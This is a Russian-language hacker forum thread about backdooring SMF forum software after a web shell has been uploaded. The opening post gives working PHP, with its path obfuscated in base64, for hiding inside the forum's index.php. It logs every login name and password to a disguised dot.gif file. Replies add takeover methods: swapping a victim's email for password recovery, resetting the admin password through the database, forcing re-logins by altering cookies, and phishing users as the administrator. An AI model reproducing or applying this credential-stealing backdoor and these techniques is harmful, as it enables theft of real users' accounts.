Форумы Трояним Smf (узнаём пассы имея шелл)

Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума !

Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
ПАЛЕВО !!!! скажите -)
Да нет -)
Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
Итак, есть файлик и в него будем сейвить пасы )
Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...

PHP:

$patch_ = getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9kb3QuZ2lm');
        $patch_ = str_replace("\\","/",$patch_); 

if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '')
      {  
        $f_l = fopen($patch_,'a+');      
   fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");  
       fclose($f_l);      
}



этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
После него вставляем сам скрипт !
Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))

А что если юзверь авторизуется через куки и пасс вообще не вводит ?
Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
Но и на таких есть управа -)
Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
Удачи вам в вашем нелёгком, но я думаю правильном направлении !

 

а ещё можно
через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d

а ещё можно сменить временно пас админа который не брутиться ( опять же шелл в помошь ) залезть в панель админа форума, если есть возможность увидеть пас в открытом виде узверя который так сволочь тебе нужен аж ппц то всё чисто-гладко,
если не видно - то ты как наделённый правами админа шлёшь письмо от лица администратора письмо тому горемыки, чтоб он вражина в срочном порядке подтвердил что он не забыл свой пас и выслал его тебе на мыло в подтверждение - можно сделать массовую рассылку :d

P.s. у многих в подписе вижу: КУПЛЮ ШЕЛЛ С ВОЗМОЖНОСТЬЮ ЗАПИСИ В ИНДЕКС - что значит, другие варианты пролетают, шеллы ваши мы не купим.
А что мешает проделать тоже самое ( о чём не сложно догадаться ) на том шелле где нет прав на редактирования файла? Ничего!
Временная смена паса админу через мускуль (ну если тока речь не идёт об авторизации по Ip ) - заход в админку (правда я встречал такие админки, что как обычным юзером себя чувствуешь - минимализм ) - и меняй что те нуно.... ИМХО в 80% случаев это проканает на ура.

 

А можно поподробнее, а то у меня с явой никак

 

а че нить такое можно с Ipb Замутить?...млина неплохо было бы!

 

где же взять шелл для проделывания таких крутых вещей? или хотя бы где его взять для IPB 1.3 Final?

 

Такая же фишка для IPB описана здесь
и тут

 

Там эта фишка работает с мускулем и создаёт там левое табло, которое спалят (ИМХО) быстрей, чем неприметную картинку на серваке ...

 

Ну шел можно взять например от маднета... а как залить его на IPB смотри ТУТ , версия не совпадает но можно попробывать.

 

да ладно, это ж как он ретривнется, если в бд он в хеше хранится? точно не помню, но пасс полюбому новый присылается рандомный.

 

а невориант посмотреть с конфиге логин и пас к мускул зайти в неё через шел и там посмотреть все пасы пользователей? но при этом открыть страницу md5.xek.cc

 

Хеш то соленый, тем более что в smf шифруется не md5() а sha(), а для него таких обьемных баз нету

 

Способ не оч хороший…или не доработанный …записи идут где пароли звёздочками закрыты ..где кодировка левая…..

 

Давно хотел спросить, от чего такое происходит. Разве скрипту они присылаются в таком виде?

 

А я вот и думаю от чего он так, скрипт то сработает, то фигню запишет ... может это жабаскрипт в форуме всё портит ? пока не разобрался

 

Когда я пытался сделать тоже самое не уровне бд получалось то же самое, ява не виновата, походу это что-то связанное с сессиями/куками

 

Здесь набросал небольшой мануал. Если есть дополнения или улучшения пишите в личку

 

Добрые люди, скажите, что такое "шелл" ???

 

а если пасс будет например ][Ott@быч
твой md5.xek.cc будет брутить его вечно)
по поводу кук, я с Smf не сталкивался но скорей всего можно просто уменьшить время существования сессии.

 

Сори за флуд

Скажите пожалуйста, что такое "шелл" и "хеш" ??? и если можно, дайте ссыль на расшифровку подобных сокращений )) заранее спасибо!